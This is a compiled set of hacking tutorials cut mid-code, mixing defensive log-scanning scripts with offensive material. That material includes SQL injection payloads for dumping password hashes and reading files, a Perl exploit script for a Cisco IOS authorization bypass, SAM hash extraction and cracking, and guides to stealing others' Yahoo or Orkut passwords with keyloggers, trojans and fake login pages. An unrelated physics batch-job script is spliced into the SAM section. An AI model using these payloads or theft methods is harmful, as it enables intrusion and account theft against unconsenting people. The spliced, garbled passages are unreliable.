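    """Rewrite 0x.. literals that decode to printable ASCII as quoted
    strings (the 'Strings without Quotes' trick) and collect the values."""
    found: list[str] = []

    def repl(m: re.Match) -> str:
        digits = m.group(1)
        if len(digits) % 2:
            return m.group(0)
        try:
            value = unhexlify(digits).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            return m.group(0)
        if not value.isprintable():
            return m.group(0)
        found.append(value)
        return "'" + value + "'"

    return HEX_LITERAL_RE.sub(repl, text), found


def classify(url: str) -> list[str]:
    """Labels that fire for one request URL after normalisation."""
    _, _, query = url.partition("?")
    decoded = unquote_plus(query)  # %27 -> ', + -> space, %2b -> +
    decoded, hex_values = decode_hex_literals(decoded)
    # Two views of inline comments: removed (DR/**/OP -> DROP) and replaced
    # by a space (SELECT/**/password -> SELECT password).
    views = (INLINE_COMMENT_RE.sub("", decoded), INLINE_COMMENT_RE.sub(" ", decoded))
    labels = [name for name, rx in SIGNATURES if any(rx.search(v) for v in views)]
    if INLINE_COMMENT_RE.search(decoded):
        labels.append("inline-comment")
    labels.extend("hex-literal=" + v for v in hex_values)
    return labels


def scan_log(log_text: str) -> list[tuple[str, list[str]]]:
    """(request URL, labels) for every log line that trips a signature."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        labels = classify(m.group(1))
        if labels:
            hits.append((m.group(1), labels))
    return hits


if __name__ == "__main__":
    for url, labels in scan_log(SAMPLE_LOG):
        print(url, "->", ", ".join(labels))
```

The arithmetic probe id=5-1 from the list above deliberately trips nothing here: it is only recognisable by comparing the response with that of id=4, not by pattern.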
Some Extra MySQL Notes
Sub queries only work in MySQL 4.1+
Users
SELECT User,Password FROM mysql.user;
SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = 'root';
SELECT ... INTO DUMPFILE
Write query into a new file (can not modify existing files)
UDF Function
create function LockWorkStation returns integer soname 'user32';
select LockWorkStation();

create function ExitProcess returns integer soname 'kernel32';
select exitprocess();
SELECT USER();
SELECT password,USER() FROM mysql.user;
First byte of admin hash
SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;
Read File
query.php?user=1+union+select+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
MySQL Load Data infile

By default it's not available!
create table foo( line blob );
load data infile 'c:/boot.ini' into table foo;
select * from foo;
More Timing in MySQL
select benchmark( 500000, sha1( 'test' ) );
query.php?user=1+union+select+benchmark(500000,sha1 (0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
select if( user() like 'root@%', benchmark(100000,sha1('test')), 'false' );
Enumeration data, Guessed Brute Force
select if( (ascii(substring(user(),1,1)) >> 7) & 1, benchmark(100000,sha1('test')), 'false' );

Potentially Useful MySQL Functions
MD5()
MD5 Hashing

SHA1()
SHA1 Hashing


PASSWORD()
ENCODE()
COMPRESS()
Compress data, can be great in large binary reading in Blind SQL Injections.

ROW_COUNT()
SCHEMA()
VERSION()
Same as @@version

Second Order SQL Injections
Basically you put an SQL Injection into some place and expect it to be unfiltered in another action. This is a common hidden-layer problem.

Name : ' + (SELECT TOP 1 password FROM users ) + '
Email : xx@xx.com

If the application is using the name field in an unsafe stored procedure or function, process etc., then it will insert the first user's password as your name, etc.

Forcing SQL Server to get NTLM Hashes
This attack can help you get the SQL Server user's Windows password from the target server, but possibly your inbound connection will be firewalled. It can be very useful in internal penetration tests. We force SQL Server to connect to our Windows UNC share and capture the NTLM session data with a tool like Cain & Abel.

Bulk insert from a UNC Share (S)
bulk insert foo from '\\YOURIPADDRESS\C$\x.txt'

- Hacking zip,doc,rar,ppt,xls,pdf files -

Hacking zip,doc,rar,ppt,xls,pdf files - part 1
Hi guys and gals, this is vivek da great here. This tutorial is for hacking (call it "password recovering" if you want to) the following types of file passwords:

microsoft word(.doc)
microsoft excel(.xls)
microsoft powerpoint(.ppt)
winzip(.zip, .exe(SFX-ZIP)) - Turbo Zip Cracker (http://www.fdrlab.com/)
winrar(.rar, .exe(SFX-RAR)) - Advanced RAR Password Recovery (ARPR) (http://www.elcomsoft.com/prs.html)
acrobat reader(.pdf) - Advanced PDF Password Recovery Pro (APDFPRP) (http://www.elcomsoft.com/prs.html)

The passwords we are gonna hack are set by the respective programs (different for all formats). The programs we are gonna use are based on dictionary attacks, hybrid attacks, password masks and brute force attacks (the last option).

Lets begin by a brief of various kinds of attacks:
1. dictionary attacks: in this the program uses a list of words in lexicographic order. these words can be stored as csv(comma seperated values), nsv(newline seperated values or ssv(space seperated values. the program juz takes the words one-by-one from the dictionary list and starts trying it on the file. if the right password is found, then the program halts with a success else it returns the result that the attack has been successful. now you can find all kinds of wordlists on google or altavista(remember my tutorial "hackers friendly google").
Part 2

2. hybrid attacks: these attacks involve appending 1 to 3 characters to the dictionary words, e.g. heaven64, boy007, vinyl6; here the characters 64, 007 and 6 are appended after dictionary words to increase the number of permutations, as some of the people out there like to use these kinds of passwords.

3.password mask: If you already know some characters in the password, you can specify the mask to decrease the total number of passwords to be verified. At the moment, you can set the mask only for fixed-length passwords, but doing this can still help. For example, you know that the password contains 8 characters, starts with 'x', and ends with '99'; the other symbols are small or capital letters. So, the mask to be set is "x?????99", and the charset has to be set to All caps and All small. With such options, the total number of the passwords that the recovery program will try will be the same as if you're working with 5-character passwords which don't contain digits; it is much less than if the length were set to 8 and the All Printable option were selected. In the above example, the '?' chars indicate the unknown symbols.

4. brute force: this is the last option; once the dictionary and hybrid attacks fail you have to try this. It involves trying all the permutations and combinations of all ASCII characters (there are 255 of them, including 0-9, a-z, A-Z, and some special characters) until the right password is found.
You will now be able to crack any of the above mentioned files. Find the recovery software at:

http://www.elcomsoft.com/prs.html
http://www.fdrlab.com/
http://www.intelore.com/rar_password_recovery.php

***Live Cd For Wireless Hacking***

This version is for all systems except systems with the Intel B/G wireless cards (IPW2200).

- Live CD with all the tools you need to hack a WLAN / wireless Access point -
Linux Live-CD - OS runs from CD - 635 mb - .iso
- also used by the FBI ...


WEP Hacking - The Next Generation

WEP is an encryption scheme, based on the RC-4 cipher, that is available on all 802.11a, b and g wireless products. WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver.

Both sides must have the same WEP key, which is usually a total of 64 or 128 bits long. A semi-random 24 bit number called an Initialization Vector (IV), is part of the key, so a 64 bit WEP key actually contains only 40 bits of "strong" encryption while a 128 bit key has 104. The IV is placed in encrypted frame's header, and is transmitted in plain text.

Traditionally, cracking WEP keys has been a slow and boring process. An attacker would have to capture hundreds of thousands or millions of packets, a process that could take hours or even days, depending on the volume of traffic passing over the wireless network. After enough packets were captured, a WEP cracking program such as Aircrack would be used to find the WEP key.

Fast-forward to last summer, when the first of the latest generation of WEP cracking tools appeared. This current generation uses a combination of statistical techniques focused on unique IVs captured and brute-force dictionary attacks to break 128 bit WEP keys in minutes instead of hours. As Special Agent Bickers noted, "It doesn't matter if you use 128 bit WEP keys, you are vulnerable!"
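An added illustration (mine, not part of the original post) of why the 24-bit IV is the weak point: the key arithmetic the text gives, the birthday bound on how soon an IV must repeat, and an audit routine that finds IV reuse in a constructed capture. The frame body layout assumed for the sample (3 IV bytes, 1 key-id byte, then ciphertext) is stated in the comments.

```python
import math

IV_BITS = 24                 # WEP's per-frame Initialization Vector, sent in clear text
IV_SPACE = 2 ** IV_BITS      # 16,777,216 distinct IVs before the space is exhausted


def effective_key_bits(advertised_bits):
    """Secret portion of a WEP key: the advertised size minus the 24 plaintext
    IV bits (64 -> 40, 128 -> 104, as the text states)."""
    return advertised_bits - IV_BITS


def expected_frames_until_iv_repeat(iv_bits=IV_BITS):
    """Birthday estimate: with IVs drawn at random, the first repeat is expected
    after about sqrt(pi/2 * 2^n) frames, only a few thousand for n = 24."""
    return math.sqrt(math.pi / 2 * 2 ** iv_bits)


def parse_iv(wep_body):
    """Pull the IV out of a WEP-encrypted frame body. Assumed layout: 3 IV bytes,
    1 key-id byte, then ciphertext. Returned as bytes so no byte order is assumed."""
    if len(wep_body) < 4:
        raise ValueError("too short to be a WEP frame body")
    return bytes(wep_body[:3])


def find_iv_reuse(frame_bodies):
    """Audit captured frame bodies and report each IV seen more than once as
    (iv, first_index, repeat_index). Two frames under the same key with the
    same IV were encrypted with the same RC4 keystream, so both lose secrecy."""
    first_seen = {}
    reuse = []
    for idx, body in enumerate(frame_bodies):
        iv = parse_iv(body)
        if iv in first_seen:
            reuse.append((iv, first_seen[iv], idx))
        else:
            first_seen[iv] = idx
    return reuse


# Constructed capture: the third frame reuses the first frame's IV, the way an
# adapter that restarts its IV counter at zero after a reset would.
SAMPLE_FRAMES = [
    bytes([0x00, 0x00, 0x01, 0x00]) + b"\x9a\x1b\xcc\x20",
    bytes([0x00, 0x00, 0x02, 0x00]) + b"\x41\x7e\x0f\x11",
    bytes([0x00, 0x00, 0x01, 0x00]) + b"\xd3\x3a\x85\x9c",
]

if __name__ == "__main__":
    print("secret bits in a 64-bit WEP key:", effective_key_bits(64))
    print("frames until an IV is expected to repeat:",
          round(expected_frames_until_iv_repeat()))
    print("IV reuse in the sample capture:", find_iv_reuse(SAMPLE_FRAMES))
```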

Basic Directions:

1)Boot from cd
2)get the wep key
3)write it down
4)reboot into windows
5)connect using wep key.

Here is the link:
ftp.rz.tu-braunschweig.de/pub/mirror/auditor/auditor-250405-01.iso

Brute Force Engine

Language:C++

Author:ASKOPPAL

Location:http://askoppal.googlepages.com/BFE.txt

Details: Finds every possible combination of the ASCII characters between 33 and 126. The characters between 33 and 126 are all of the chars that can be typed on our keyboard, including special chars. This program works perfectly for cracking passwords.


ASKOPPAL
www.microhard.co.nr
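An added worked example (mine, not the page's code) that puts numbers on the attack descriptions in the file-cracking tutorial above and on the 33-126 character set of this Brute Force Engine: keyspace functions for mask, hybrid and exhaustive attacks, checked against the claim that the mask "x?????99" over letters costs the same as a 5-letter search. The guessing rate is an assumed placeholder, not a measured figure.

```python
import string

# Character classes the two passages refer to.
LETTERS = string.ascii_letters                               # "All caps" + "All small": 52
PRINTABLE_33_126 = "".join(chr(c) for c in range(33, 127))  # the engine's 94 keyboard chars


def mask_keyspace(mask, charset=LETTERS, wildcard="?"):
    """Candidates a mask attack must try: only the wildcard positions vary,
    each over len(charset) symbols; the known characters cost nothing."""
    return len(charset) ** mask.count(wildcard)


def brute_force_keyspace(length, charset=PRINTABLE_33_126):
    """Exhaustive search over every string of exactly `length` symbols."""
    return len(charset) ** length


def hybrid_keyspace(wordlist_size, max_suffix=3, suffix_charset=string.digits):
    """Dictionary words with 0..max_suffix symbols appended (heaven64, boy007, vinyl6)."""
    return sum(wordlist_size * len(suffix_charset) ** k for k in range(max_suffix + 1))


def hours_to_exhaust(keyspace, guesses_per_second):
    """Worst-case wall-clock hours to try the whole keyspace at a given rate."""
    return keyspace / guesses_per_second / 3600


def compare_policies(rate=1_000_000):
    """Worked numbers behind the text's claims; `rate` is an assumed placeholder
    (real tools differ by file format and hardware)."""
    cases = {
        "mask x?????99 over letters": mask_keyspace("x?????99"),
        "5 letters, no digits": brute_force_keyspace(5, LETTERS),
        "8 chars, all printable 33-126": brute_force_keyspace(8),
        "1000 words + up to 3 digits": hybrid_keyspace(1000),
    }
    return {name: (size, hours_to_exhaust(size, rate)) for name, size in cases.items()}


if __name__ == "__main__":
    for name, (size, hours) in compare_policies().items():
        print(f"{name:32s} {size:>22,d} candidates  ~{hours:,.1f} h")
```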

Brute force IOS HTTP authorization vulnerability

#!/usr/bin/perl

#
# Brute force IOS HTTP authorization vulnerability (Cisco Bug ID CSCdt93862).
#

use LWP;
use IO::Handle;

# Target host name or address, taken from the first command-line argument.
my $host = shift;

print "$host: ";
flush STDOUT;

my $agent = LWP::UserAgent->new;
my $request = HTTP::Request->new(GET => "http://$host/");
my $response = $agent->request($request);
my $level;

# A Cisco HTTP server answers the root URL with 401; anything else is not a target.
if ($response->is_success || $response->code != 401) {
    if ($response->header('Server') ne '') {
        print $response->header('Server');
        print "\n";
    }
    else {
        print "unexpected response, may not be a Cisco.\n";
    }
    exit;
}

# Try each level described in the advisory until one is accepted.
for ($level = 16; $level <= 100; $level++) {
    $request->uri("http://$host/level/$level/exec/show/config");
    $response = $agent->request($request);
    if ($response->is_success) {
        # A 200 means the level was accepted; save the returned configuration.
        open(HOST, ">$host") || die ("Can't open file $host\n");
        print HOST $response->content;
        close(HOST);
        print "exploited.\n";
        exit;
    }
    else {
        if ($response->code != 401) {
            print "unexpected response, may not be a Cisco.\n";
            exit;
        }
    }
}

print "failed.\n";

____________
Credits:
r45c4l

The code is downloaded from here

http://www.phreedom.org/solar/code/ios-http-auth/ios-http-auth.pl

and credits goes to phreedom crew.

First have a look here:

http://www.cisco.com/warp/public/707/cisco-sa-20010627-ios-http-level.shtml

----Excerpts---
By sending a crafted URL it is possible to bypass authentication and execute any command on the router at level 15 (enable level, the most privileged level). This will happen only if the user is using a local database for authentication (usernames and passwords are defined on the device itself). The same URL will not be effective against every Cisco IOS software release and hardware combination. However, there are only 84 different combinations to try, so it would be easy for an attacker to test them all in a short period of time.

The URL in question follows this format:

http:///level/xx/exec/....

Where xx is a number between 16 and 99.

This vulnerability is documented as Cisco Bug ID CSCdt93862.
-----------------

As you can see, this is one of the easiest exploits. The main part of the code is

--code--
for ($level = 16; $level <= 100; $level++) {
$request->uri("http://$host/level/$level/exec/show/config");
$response = $agent->request($request);
--------

What the program does is replace the variable $host with the device name, while $level varies from 16 to 99 in the for loop. The program requests the page /show/config and, if the page is returned successfully, the response is logged; otherwise it moves on to the next level [because if an incorrect request is made the server will return errors like 200/401 etc.].

-----[Revision]----
my $host = shift;
It's a PoC, so the original author left it, but to make it functional you must replace 'shift' with the IP address of the Cisco device.
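A defender-side counterpart to the script above, added here and not part of the original post: it classifies request paths by the /level/xx/exec/ shape quoted from the advisory and reports sources that tried levels outside the real IOS privilege range of 0 to 15. The "<source ip> <method> <path>" line format is constructed for the example, not a real IOS or proxy log format.

```python
import re

# Path shape from the advisory: /level/xx/exec/...  (xx = 16..99 is the probe range)
LEVEL_PATH = re.compile(r"^/level/(\d{1,3})/exec(?:/|$)")

# Real IOS privilege levels are 0..15 (15 = enable); a higher level is never legitimate.
VALID_LEVELS = range(0, 16)


def level_of(path):
    """Return the integer level in a /level/xx/exec/ path, or None for other paths."""
    m = LEVEL_PATH.match(path)
    return int(m.group(1)) if m else None


def classify_request(path):
    """'probe' for a level outside 0..15, 'normal' for a real level or any other path."""
    level = level_of(path)
    if level is None or level in VALID_LEVELS:
        return "normal"
    return "probe"


def scan_requests(lines):
    """Parse constructed '<src ip> <method> <path>' lines and collect, per source,
    the set of out-of-range levels it requested. A source walking 16, 17, 18...
    is the loop in the script above as seen from the network."""
    probes = {}
    for line in lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        src, path = parts[0], parts[2]
        if classify_request(path) == "probe":
            probes.setdefault(src, set()).add(level_of(path))
    return probes


# Constructed traffic: an admin using the real enable-level URL, a scanner walking levels.
SAMPLE_REQUESTS = [
    "10.0.0.2 GET /level/15/exec/show/running-config",
    "10.0.0.5 GET /level/16/exec/show/config",
    "10.0.0.5 GET /level/17/exec/show/config",
    "10.0.0.5 GET /level/42/exec/show/config",
    "10.0.0.7 GET /index.html",
]

if __name__ == "__main__":
    for src, levels in scan_requests(SAMPLE_REQUESTS).items():
        print(f"{src}: requested invalid privilege levels {sorted(levels)}")
```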

Web-Based Password Cracking

This is for educational purpose only.

Password cracking doesn’t have to involve sophisticated tools; many times password guessing works well. It can be a tedious process, although human intuition can beat automated tools.

The basic types of password attacks include:

(1) Dictionary attacks – A text file full of dictionary words is loaded into a password program and then run against user accounts located by the application. If simple passwords have been used, this might be enough to crack the code.
(2) Hybrid attacks – Similar to a dictionary attack, except that hybrid attacks add numbers or symbols to the dictionary words. Many people change their passwords by simply adding a number to the end of their current password. The pattern usually takes this form: first month's password is Mike; second month's password is Mike2; third month's password is Mike3; and so on.
(3) Brute force attacks – The most comprehensive form of attack and the most potentially time-consuming. Brute force attacks can take weeks, depending on the length and complexity of the password.

Some of these password cracking tools are:

(1) WebCracker – A simple tool that takes text lists of usernames and passwords and uses them as dictionaries to implement basic authentication password guessing.
(2) Brutus – Brutus can perform dictionary or brute force attacks against Telnet, FTP, SMTP, and web servers.
(3) ObiWan – Another web password cracking tool.

With logging enabled, you should be able to detect such tools. Following are a few entries from the Winnt\system32\Logfiles\W3SVC1 folder. They should look familiar:

192.168.13.3 sa HEAD /test/basic - 401 Mozilla/4.0+ (Compatible);Brutus/AET
192.168.13.3 administration HEAD /test/basic - 401 Mozilla/4.0+ (Compatible) ; Brutus/AET
192.168.13.3 admin HEAD /test/basic - 401 Mozilla/4.0+ (Compatible) ; Brutus/AET

Finding log information that leads directly to an attacker is not always so easy. Sometimes attackers will practice URL obfuscation. This allows the attacker to attempt to hide his IP address. Attackers will also attempt to use cookies to further their hold on a system.
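Added detection logic (mine, not from the original post) run over constructed W3SVC-style entries in the shape of the excerpt above: it flags a source that announces one of the named tools in its user agent, or that collects repeated 401s across several usernames, while a single user mistyping a password is left alone.

```python
from collections import defaultdict

# Constructed entries in the shape of the page's excerpt:
# <client ip> <username> <method> <uri> <query> <status> <user agent>
SAMPLE_LOG = [
    "192.168.13.3 sa HEAD /test/basic - 401 Mozilla/4.0+(Compatible);Brutus/AET",
    "192.168.13.3 administration HEAD /test/basic - 401 Mozilla/4.0+(Compatible);Brutus/AET",
    "192.168.13.3 admin HEAD /test/basic - 401 Mozilla/4.0+(Compatible);Brutus/AET",
    "192.168.13.3 root HEAD /test/basic - 401 Mozilla/4.0+(Compatible);Brutus/AET",
    "192.168.13.7 - GET /index.htm - 200 Mozilla/4.0+(compatible;+MSIE+6.0)",
    "192.168.13.9 jsmith GET /test/basic - 401 Mozilla/4.0+(compatible;+MSIE+6.0)",
    "192.168.13.9 jsmith GET /test/basic - 200 Mozilla/4.0+(compatible;+MSIE+6.0)",
]

# User-agent fragments of the guessing tools the text names.
TOOL_AGENTS = ("Brutus", "WebCracker", "ObiWan")


def parse_entry(line):
    """Split one entry into fields; the user agent keeps any remaining spaces."""
    parts = line.split(None, 6)
    if len(parts) != 7:
        return None
    ip, user, method, uri, query, status, agent = parts
    if not status.isdigit():
        return None
    return {"ip": ip, "user": user, "method": method, "uri": uri,
            "status": int(status), "agent": agent}


def detect_guessing(lines, min_failures=3):
    """Return {ip: [reasons]} for sources that either advertise a known tool in
    their user agent or rack up `min_failures` 401s across more than one username."""
    stats = defaultdict(lambda: {"failures": 0, "users": set(), "tools": set()})
    for line in lines:
        entry = parse_entry(line)
        if entry is None:
            continue
        s = stats[entry["ip"]]
        for tool in TOOL_AGENTS:
            if tool.lower() in entry["agent"].lower():
                s["tools"].add(tool)
        if entry["status"] == 401:
            s["failures"] += 1
            s["users"].add(entry["user"])
    alerts = {}
    for ip, s in stats.items():
        reasons = []
        if s["tools"]:
            reasons.append("tool user agent: " + ", ".join(sorted(s["tools"])))
        if s["failures"] >= min_failures and len(s["users"]) > 1:
            reasons.append(f"{s['failures']} 401s across {len(s['users'])} usernames")
        if reasons:
            alerts[ip] = reasons
    return alerts


if __name__ == "__main__":
    for ip, reasons in detect_guessing(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```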



Note: You can search in Google for Password cracking tools..........

ways of hacking

Ways to crack orkut and yahoo etc.

- Bruteforce: You can initialize a Brute forcing operation to crack e-mail accounts. You can use any Bruteforcing tool or you can even code a simple bruteforcer in C. You can get wordlists from www.theargon.com

- Using a Keylogger: You can use a keylogger to log all the keystrokes that have been processed in a system. This is an effective way to acquire passwords. You should try out Aradamax Keylogger or S-C Keylogger.

- Social Engineering: You can use Social engineering techniques to acquire passwords. This method has been very effective.

- Vulnerability Assessment: You can assess the vulnerability status of your e-mail server. Search for web application vulnerabilities like SQL Injections, XSS, CSRF, RFI, LFI, Chunk Code Errors etc.

- Phishing: You can create a fake login page that redirects the login information into your mailbox.

- Password Guessing: The least effective technique

i forgot to tell u that u can get ur frnd password by asking him too
he will tell you and you can hack his account
cool way na

Beginners steps for hacking.........
Getting Ip's:--

To see the IP of all computers you are connected to (web servers, people attempting to hack into your computer):
Go to DOS (start > run > type command) and run the netstat command. Type netstat /? for details.

Type netstat -r at the command prompt to see the IP of all computers you are connected to.

In MSN (and other programs) when you are chatting to someone, everything you type goes through the MSN servers first (they act as a proxy), so you see their IP rather than that of the person you are chatting to. You can get round this by sending them a file, as MSN doesn't send files through its proxy.
When you type netstat -r (or -a for a different view) the IPs are under the foreign address table. The ports are separated by a : . Different programs use different ports, so you can work out which IPs are from which program.
Connecting to other computers and what ports are:--

Servers send information. Clients retrieve. Simple.
Windows comes with a built in program to connect to other computers called telnet.
To start Windows telnet Start menu> Run> type Telnet. Click connect> remote system
Ports are doors into computers. Hosts are computer names
(ip number or a name that is translated into the ip automatically)
Different programs open different ports, but they always open the same ports so other computers know which port to connect to. You can get a port list listing all the different ports, but a basic one is:
11 :- Sends info on the computer
21 :- FTP (File transfer program)
23 :- Telnet (Login to the computers command line)
25 :- Smtp (Sends mail)
80 :- Http (Web pages)
There are thousands of different programs using different ports. You can get programs called portscanners which check a computer for all ports up to a certain number, looking for ways in. You can portscan a computer looking for ways-in.
Anyway, back to telnet.
Type http://www.yahoo.com/ as the host and 80 as the port, then click connect.
If nothing happens, you're in. Wow. You are connected to Y

if u lost ur password of folder then

access the SAM file in system32

The SAM tcl file would be:


module disable ConfigManager
talk DHInput
# Adjust the max files to ensure you dont time out!
maxFiles set 40
include dataset $env(SAM_DATASET)
cache set SAM
show include
exit

There is a command analogous to DCache, cache set SAM, indicating that we want SAM to manage access to this particular dataset. Disabling the ConfigManager is needed to ensure the program does not crash after waiting for a tape and losing its database connection. Since files will automatically be delivered to each process, and since it can take time for processes to get started, it is necessary to ensure that the maximum number of files any process gets can be processed within the time allowed for the batch queue. For example, if 15 files take 30 min (typical AC++Dump time), then 60 files is the maximum that the short queue (2 hours) can handle. You would want to set maxFiles to 50 or 55 to be on the safe side. If you have 690 files in your dataset (as jbot0h does) then you need 13 processes and would want to submit ``from 1 to 13''. Since CAF puts 10 processes in a section, you may want to submit 1 to 20.
The shell script (caf_sam.sh) one would use to run a SAM job would look like:

#!/bin/sh

# Normal cdfsoft setup
...
#SAM setup
setup sam -q prd
export CDF_USER_NAME=stdenis
# For Beta testing, please use this!
export SAM_INPUT_DEBUG=1
# Analysis execution command, clean up, etc
...

The only difference is that you have to setup sam explicitly.

You could also access the SAM file, save it to a floppy using DOS and use L0phtCrack to decode the password.

Introduction
L0phtCrack is designed to recover passwords for Windows NT. NT does not store the actual passwords on an NT Domain Controller or Workstation. Instead it stores a cryptographic hash of the passwords. L0phtCrack can take the hashes of passwords and generate the cleartext passwords from them.

Installation
Unzip the distribution archive, lc2exe.zip into a directory. Create a shortcut to the executable l0phtcrack.exe (or l0phtcrack95.exe for Win95) and you are done unless you want to use the network sniffing feature.

To do network sniffing you need to install an NDIS network driver. This driver will only work on ethernet network devices. Go to the Network settings in the Control Panel. Select the Protocols tab and press the Add.. button. Press Have Disk... and specify the directory where you installed L0phtCrack. This is where the Oemsetup.inf file is. You will need to restart before the new driver takes effect.



Accessing the Password Hashes
Before the passwords can be computed you need to retrieve the password hashes. There are 3 main methods to get the password hashes: from the registry directly, from a SAM file on disk, or by sniffing the network.
Dumping From the Registry
If you have administrator privileges you can get the password hashes using the 'Tools Dump Passwords from Registry' command. Specify a computername or IP address in the format \\computername or \\ipaddress. NT can be configured to disallow access to the registry remotely over the network, so you may need to be on the local machine if this is the case. Microsoft introduced the SYSKEY utility in NT SP3. If SYSKEY is running the password hashes are encrypted and cannot be retrieved in this manner.

If you are using a non-English language version of NT, your version may use a different word for Administrators. If so you need to modify a registry key to get Dump Passwords to work. Run regedit.exe and edit the value of the key:

HKEY_CURRENT_USER\Software\LHI\L0phtCrack\AdminGroupName

Set it to your language version of 'Administrators'.



Extracting From a SAM File
The next method is new for L0phtCrack 2.0. You can retrieve the password hashes from the SAM file on the hard disk, from an NT Emergency Repair Disk, or from a backup tape. The NT registry is actually stored in several different files on the system disk in the d:\winnt\system32\config directory.

These files cannot be accessed while NT is running since they are opened exclusively by the operating system. If you have physical access you can boot the machine with a DOS floppy and use a program such as NTFSDOS (http://www.ntinternals.com/ntfs20r.zip) to copy the SAM file from d:\winnt\system32\config to a floppy disk. You can then use the L0phtCrack command 'File Import SAM' to extract the password hashes from the SAM file.

Another place to find the SAM file that doesn't require rebooting the machine is in the d:\winnt\repair directory or on an Emergency Repair floppy disk. Whenever a repair disk is made the contents of the SAM in the registry is saved and compressed into the file 'sam._'. This file can be uncompressed with the command:

expand sam._ sam
The expanded SAM file can be imported into L0phtCrack.

The SAM file is also backed up onto tape when a full backup is performed. If you have access to a backup tape you can restore the SAM file from d:\winnt\system32\config to another machine and import it into L0phtCrack.

If SYSKEY from NT 4.0 SP3 is installed all of the SAM files are encrypted and cannot be read by L0phtCrack.

Sniffing on the Network
If SYSKEY is installed and you have no network access to the registry or physical access don't fret. There is a 3rd method for obtaining the password hashes, network sniffing. Network sniffing requires that you are on a physical segment of the user or the resource they are accessing. The sniffer, readsmb.exe, included with L0phtCrack 2.0 will only work on Windows NT 4.0.

Follow the instructions in the Install section for installing the network driver necessary for using the network sniffer.

The network sniffer is a command line program named readsmb.exe. Run it and redirect its output to a file with the command:

readsmb > passwd

You probably want to let this run for a day or so to collect enough password hashes. You can then open this file into L0phtCrack using the command File Open.

Readsmb.exe also has a verbose mode that can be enabled by using the -v command: readsmb -v This output is not formatted properly for opening with L0phtCrack but it may be useful to you. On slow machines the -v option may cause readsmb to miss some packets so it is really just for debugging and exploring.



Computing Passwords
So now that you have the password hashes loaded into L0phtCrack you want to start computing. You start computing by using the command Tools Run. The default options are set to first run a dictionary computation using the default dictionary, words-english that comes with the L0phtCrack distribution and then run a Brute Force computation using the default character set, A-Z.

L0phtCrack will save the state of the computation every 5 minutes to a .LC file.

The Tools Options menu command lets you select whether you want to do a dictionary attack and/or brute force attack
Password Crackers
NTFSDOS - (http://www.sysinternals.com)

pwdump2 - (http://www.webspan.net/~tas/pwdump2/)

John the Ripper - (http://www.openwall.com/john/)

L0phtCrack - (http://www.atstake.com/research/lc3/)

chntpw - (http://home.eunet.no/~pnordahl/ntpasswd/)

*** Password Recovery Tool***

Cain And Abel (HOT Soft)

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weaknesses present in protocol standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some "non standard" utilities for Microsoft Windows users.

Cain & Abel has been developed in the hope that it will be useful for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration testers and everyone else that plans to use it for ethical reasons. The author will not help or support any illegal activity done with this program. Be warned that there is the possibility that you will cause damage and/or loss of data using this software and that in no event shall the author be liable for such damage or loss of data. Please carefully read the License Agreement included in the program before using it.
The latest version is faster and contains a lot of new features like APR (Arp Poison Routing) which enables sniffing on switched LANs and Man-in-the-Middle attacks. The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS, and contains filters to capture credentials from a wide range of authentication mechanisms. The new version also ships routing protocols authentication monitors and routes extractors, dictionary and brute-force crackers for all common hashing algorithms and for several specific authentications, password/hash calculators, cryptanalysis attacks, password decoders and some not so common utilities related to network and system security.


Download links:- http://cain-abel.en.softonic.com/

mirror:-http://www.snapfiles.com/get/cainabel.html

methods of getting yahoo passwords


I will explain in this tutorial how to obtain yahoo passwords in different ways, so that any n00b can understand and do it.
It actually isn't that hard; the problem is that with the passing of years yahoo security has been getting better and better and most proggies don't work anymore. Now I will present to you the most effective, reliable and easy to do methods. After that I will also inform you on how to protect yourself from these dangers that go around the internet.

METHOD 1
------BRUTE FORCING------
This is by far the most used method. You can find crackers everywhere to download. On http://www.hackerspk.com/ there are a lot of good cracked downloads. The one I suggest is R-G-Kracka; it's easy to use and works. This is the most sawed-for method, but it is good for 2 things: cracking boots, and when you really want a password and will spend some time cracking, testing and working.
For this you have to get a cracker, a password list and in some cases a proxy list, but I suggest you try a non-proxy cracker if it's your first time.
This is a basic method and I'm sure that everyone will get it the first time, although results depend on your password list.
PROTECTION: It's simple: get a very long password with ASCII characters and numbers. The hardest and longest password, the one a brute forcer will have trouble cracking and getting to, is the last of all ASCII letters and numbers; the last password a normal brute forcer of, let's say, 10 chars will try is "zzzzzzzz9!". This password will be the last one it tries to crack.

method 2
------TROJAN PASSWORD STEALER------
This is one of the most effective methods of obtaining passwords at this time. You get a program named Y! Jacked/mps1.5se/sub7 or one of its many variations from http://www.cyberpunkz.com/ or http://www.hackerspk.com/; there are many trojans and stealers.
With this you have to take the main program, put it in a folder and generate a trojan that you send via attachment to the victim's mailbox. When that person opens it you will have his password. This is an easy to use program; just take care that most antiviruses see it as a virus and you shouldn't get alarmed by that. It has a lot of options that you will surely understand if you know English.
PROTECTION: It's the easiest way to protect yourself: don't open attachments from anybody. I can send a mail with an attachment from any mail address I want, for example. It's not smart to open any attachment without a good antivirus.

METHOD 3
------THE FAKE LOGIN------
This is a modified login page for yahoo. Its code has been altered. Instead of sending the password and the user to a yahoo server for logging in, it sends them to a yahoo server that sends them to a mail account.
Get one of these from certain people lol.
